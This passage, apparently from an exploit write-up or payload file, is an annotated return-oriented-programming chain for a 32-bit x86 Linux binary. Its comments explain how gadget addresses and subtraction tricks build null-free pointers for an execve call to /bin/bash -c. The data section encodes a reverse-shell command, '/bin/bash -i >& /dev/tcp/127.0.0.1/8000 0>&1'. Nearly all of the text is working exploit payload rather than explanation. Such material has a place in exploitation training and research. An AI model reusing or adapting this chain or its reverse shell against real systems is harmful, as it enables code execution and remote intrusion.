0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret 0x080525d0 : xchg eax, ebp ; ret 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee ---------------------------- edx contains address of 0x080525d0 ---------------------------- time to calculate the distance to the end of data 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------- eax contains the distance to the end of data 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- eax contains the address of end of data 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- write nulls to the end of our data 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of ////bin/bash pointer 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret 0x0807abcc : mov eax, edx ; ret 0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804 dca1 ; pop ebp ; ret 0xeeeeeeee : junk value to pop ---------------------------------------------------- ecx contains the address of ////bin/bash pointer 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of ////bin/bash 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- ////bin/bash pointer now contains the correct address of ////bin/bash 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaaa6 : (0xaaaaaaaa - 4) = distance from ////bin/bash pointer to nearest null termination 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to null termination of 3rd arg 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of null termination of 3rd arg 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- 3rd arg nulls now contain 4 nulls 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa7a : (0xaaaaaaaa - 48) = distance from edx to next nulls 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance from edx to -c nulls 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of -c nulls 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- -c nulls now contain 4 nulls 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaaa2 : (0xaaaaaaaa - 8) = distance from edx to next nulls 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to the last nulls from edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of last nulls 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x08099c0f : xor eax, eax ; ret 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- last nulls now contain 4 nulls 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa6a : (0xaaaaaaaa - 64) = distance from edx to -c arg pointer 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to -c arg pointer from edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains address of -c arg pointer 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now edx contains address of -c arg pointer 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa70 : (0xaaaaaaaa - 58) = distance from edx to -c arg string 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to -c arg string 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the address of -c arg string 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- now the -c arg pointer contains the address of -c string 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaaa6 : (0xaaaaaaaa - 4) = distance from edx to third arg pointer 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to the third pointer 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- eax contains the address of third pointer 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- edx contains the address of third pointer 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa72: (0xaaaaaaaa - 56) = distance from edx to third arg string 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to the third string 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- eax contains the address of third string 0x08083f21 : mov dword ptr [edx], eax ; ret ---------------------------------------------------- third pointer contains address of third string 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to nearest null pointer 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to nearest null pointer from edx 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now edx is a pointer to nulls 0x080a8576 : pop eax ; ret 0xaaaaaaaa : value to subtract 0x08057b7e : pop ebx ; ret 0xaaaaaa66 : (0xaaaaaaaa - 68) = distance from edx to ////bin/bash string 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now eax contains the distance to ////bin/bash string 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x0807abcc : mov eax, edx ; ret 0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop 0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret 0xeeeeeeee 0xeeeeeeee : junk values to pop ---------------------------------------------------- now ebx points to ////bin/bash 0x080a8576 : pop eax ; ret 0x81fffff4 : (0x81ffffe9 + 11) 11 = execve syscall number 0x080aa1cc : sub eax, 0x81ffffe9 ; ret 0x08048c0d : int 0x80 #################DATA################## ------------------------strings--------------------- 0x2f2f2f2f : ////bin/bash 0x2f6e6962 0x68736162 0xffffffff -------------------------------------------------- 0x632dffff : -c 0xffffffff -------------------------------------------------- 0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1 0x7361622f 0x692d2068 0x20263e20 0x7665642f 0x7063742f 0x3732312f 0x302e302e 0x382f312e 0x20303030 0x31263e30 0xffffffff -------------------------pointers------------------- 0xbbbbbbbb : pointer to ////bin/bash 0xcccccccc : pointer to -c 0xdddddddd : pointer to args 0xffffffff